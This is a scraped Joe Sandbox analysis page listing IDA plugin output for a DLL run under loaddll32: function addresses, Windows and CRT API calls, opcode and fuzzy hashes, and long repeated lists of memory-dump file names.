Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AdjustPointer_memmove
String ID: bad exception
API String ID: 1721217611-3837556057
Opcode ID: 25211d584a2d8631f95a4a5bd7ed9ed7602a2ce44e1d0719ecb4f6774da7c90a
Instruction ID: 89e84701755d4bb132270be717d3a29a1bdff1e46c72d2a8012f711830c0547e
Opcode Fuzzy Hash: 25211d584a2d8631f95a4a5bd7ed9ed7602a2ce44e1d0719ecb4f6774da7c90a
Instruction Fuzzy Hash: B94108B124A3469EEB154E64D840BAA33B5DF0136EF32402DE85186FD0EF71F487D611

Function 6CEBB36F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6CEB40F7: GetSystemTimeAsFileTime.KERNEL32(6CEBB37E,?,6CEBB37E,?), ref: 6CEB40FD

__aulldiv.LIBCMT ref: 6CEBB3BA
__aulldiv.LIBCMT ref: 6CEBB3D2
__aullrem.LIBCMT ref: 6CEBB3EA

Part of subcall function 6CEB422F: __EH_prolog.LIBCMT ref: 6CEB4234

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CEBB44C

Strings

ZCl, xrefs: 6CEBB3A1, 6CEBB3B4

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Time__aulldiv$FileH_prologSystemUnothrow_t@std@@@__aullrem__ehfuncinfo$??2@
String ID: ZCl
API String ID: 435416484-1458945390
Opcode ID: 89854e108fe8a2c1de4b0bad9dc5c35386985cc4bbbdfe621d58b33c104446ab
Instruction ID: 7343a0625b9f1c60dfeff544db117a12ba43583cc06b3970a90f353a9c69a61d
Opcode Fuzzy Hash: 89854e108fe8a2c1de4b0bad9dc5c35386985cc4bbbdfe621d58b33c104446ab
Instruction Fuzzy Hash: 3041B475E00208AFDF08DFA8D945EEEBBB5FB08304F204059F519BB690DB35AA149B55

Function 6CED4BFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6CED4C14

Part of subcall function 6CED522B: ___AdjustPointer.LIBCMT ref: 6CED5274

_UnwindNestedFrames.LIBCMT ref: 6CED4C2B
___FrameUnwindToState.LIBCMT ref: 6CED4C3D
CallCatchBlock.LIBCMT ref: 6CED4C61

Strings

aPl, xrefs: 6CED4C20, 6CED4C11

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: aPl
API String ID: 2633735394-520660818
Opcode ID: 9c5089780bf8366ab0c226da4d7e0303914d76154604f1882487ef4f805f9706
Instruction ID: 71c89f9a9bdadbf06b2537d747d880e5a730864c2c2031746953e0c0880a70f4
Opcode Fuzzy Hash: 9c5089780bf8366ab0c226da4d7e0303914d76154604f1882487ef4f805f9706
Instruction Fuzzy Hash: 45012932100109BBDF125F55DD00EDA7BBAFF98718F224519F91861620D372E4A6DBA1

Function 6CEB26EC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB26FA
InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB270A
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,6CEB2A32,?,?,?,00000000), ref: 6CEB271A
GetLastError.KERNEL32(?,?,?,?,6CEB2A32,?,?,?,00000000), ref: 6CEB2724

Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13

Strings

pqcs, xrefs: 6CEB2732

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
String ID: pqcs
API String ID: 1619523792-2559862021
Opcode ID: 38085ce2ef203d1fb2b6d2eb11dd4c8be1551dd76d1307efa6c9e864882709fe
Instruction ID: d7003f82c3a788c4ec782693b2fb590e89869557d80b1939503e8dc54251ca37
Opcode Fuzzy Hash: 38085ce2ef203d1fb2b6d2eb11dd4c8be1551dd76d1307efa6c9e864882709fe
Instruction Fuzzy Hash: 27F06D70A00204AFEB50DBA1C94DEAA77BCEF05749B14066EB801E2610EAB0E8489760

Function 6CEB4B0F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB4B14
GetProcessHeap.KERNEL32(00000000,000000FF,?,?,?,?,6CEB8261,6CEB8261,?,6CEBF5E0,000000FF), ref: 6CEB4B21
HeapAlloc.KERNEL32(00000000,?,?,?,?,6CEB8261,6CEB8261,?,6CEBF5E0,000000FF), ref: 6CEB4B28
std::exception::exception.LIBCMT ref: 6CEB4B42

Part of subcall function 6CEBEDF3: __CxxThrowException@8.LIBCMT ref: 6CEBEE49

Strings

^l, xrefs: 6CEB4B37

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Heap$AllocException@8H_prologProcessThrowstd::exception::exception
String ID: ^l
API String ID: 631700923-2649338665
Opcode ID: 10af5f31a0150d82fcb0c2d8b26a728394a4fcd735ba47786a2d9d990b8e8459
Instruction ID: 3eb89ff116cb6b81e37ec922e081b5866c84c3ec8b7a56209a44f35a09d71a9f
Opcode Fuzzy Hash: 10af5f31a0150d82fcb0c2d8b26a728394a4fcd735ba47786a2d9d990b8e8459
Instruction Fuzzy Hash: BEF08C76E04249AFCB00DFE0C94ABEEB738FB09745F204559F915A3A80DB749208CBA1

Function 6CEB4E1D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 6CEB4E30
GetProcAddress.KERNEL32(00000000), ref: 6CEB4E37
GetCurrentProcess.KERNEL32(00000000), ref: 6CEB4E47

Strings

kernel32, xrefs: 6CEB4E2B
IsWow64Process, xrefs: 6CEB4E26

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32
API String ID: 4190356694-3789238822
Opcode ID: 7f0489250ce7e25c4b354e8fe58ef4f40833cf7245f14a8b9eb3f2bb1d5abc00
Instruction ID: 470b2773ab0eefbf97881572fbe80515d9340cf0e0d0a2ec26492fd1460f4ee8
Opcode Fuzzy Hash: 7f0489250ce7e25c4b354e8fe58ef4f40833cf7245f14a8b9eb3f2bb1d5abc00
Instruction Fuzzy Hash: 1BE08672D1161CB7CB50D7E49D0CD9E77BCDB0D2A5F200981BA08E3500DA3499009BA0

Function 6CECA3F0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CECA1C0: CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CECA211
Part of subcall function 6CECA1C0: WaitForSingleObject.KERNEL32(?,000000FF,321BCB28,?,?,?,?,321BCB28,6CECA193,321BCB28), ref: 6CECA228

ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 6CECA48E
ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 6CECA4AE
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 6CECA4E7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6CECA53B
SetEvent.KERNEL32(?), ref: 6CECA542

Part of subcall function 6CEB4CA0: CloseHandle.KERNEL32(00000000,?,6CECA475), ref: 6CEB4CC4

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
